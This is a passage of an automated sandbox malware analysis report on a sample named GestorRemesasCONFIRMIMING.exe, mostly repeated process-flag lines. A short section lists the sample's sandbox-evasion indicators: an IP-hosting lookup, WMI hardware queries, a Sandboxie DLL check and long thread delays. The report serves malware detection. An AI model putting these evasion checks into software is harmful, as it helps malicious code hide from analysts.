                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 3892, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: XNYbGrcoFr.exe PID: 5096, type: MEMORYSTR
                    Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Memory allocated: BC0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Memory allocated: 2580000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Memory allocated: 4580000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Memory allocated: 8920000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Memory allocated: 9920000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Memory allocated: 9C30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Memory allocated: AC30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Memory allocated: 1050000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Memory allocated: 2AC0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Memory allocated: 2880000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Memory allocated: 2520000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Memory allocated: 27D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Memory allocated: 2520000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Memory allocated: 8A40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Memory allocated: 6A20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Memory allocated: 9A40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Memory allocated: AA40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Memory allocated: 1220000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Memory allocated: 3000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Memory allocated: 2E20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 600000
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 599856
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 599726
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 599624
